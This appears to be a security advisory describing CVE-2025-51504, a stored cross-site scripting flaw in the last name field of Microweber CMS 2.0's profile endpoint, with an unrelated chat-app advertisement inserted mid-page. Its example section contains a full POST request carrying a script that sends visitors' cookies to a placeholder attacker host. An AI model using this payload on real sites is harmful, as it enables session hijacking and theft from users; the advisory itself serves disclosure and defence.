Overview
The CVE-2025-51504 vulnerability pertains to a Cross-Site Scripting (XSS) flaw found in Microweber CMS 2.0. This vulnerability affects the ‘/projects/profile’ homepage endpoint via the last name field. The implications of this vulnerability are significant, potentially leading to a system compromise and data leakage. Any system or entity utilizing Microweber CMS 2.0 should be aware of this vulnerability and take immediate corrective action.
Vulnerability Summary
CVE ID: CVE-2025-51504
Severity: High (7.6 CVSS Score)
Attack Vector: Remote Network
Privileges Required: None
User Interaction: Required
Impact: System compromise and data leakage
Affected Products
Escape the Surveillance Era
Most apps won’t tell you the truth.
They’re part of the problem.
Phone numbers. Emails. Profiles. Logs.
It’s all fuel for surveillance.
Ameeba Chat gives you a way out.
- • No phone number
- • No email
- • No personal info
- • Anonymous aliases
- • End-to-end encrypted
Chat without a trace.
Product | Affected Versions
Microweber CMS | 2.0
How the Exploit Works
An attacker can exploit this vulnerability by injecting malicious scripts into the last name field on the affected endpoint. When other users or administrators view these injected scripts, the scripts get executed within the context of their user session. This could allow the attacker to hijack user sessions, deface web sites, or redirect the user to malicious sites.
Conceptual Example Code
Here’s a conceptual example of how an attacker might exploit this vulnerability:
POST /projects/profile HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/x-www-form-urlencoded
last_name=<script>new Image().src='http://attacker-site.com/steal.php?cookie='+document.cookie;</script>
In this example, the attacker sends a POST request to the vulnerable endpoint (‘/projects/profile’) with a malicious payload in the last_name field. This script, when executed, would send the user’s cookie to the attacker’s server, effectively allowing the attacker to hijack the user’s session.

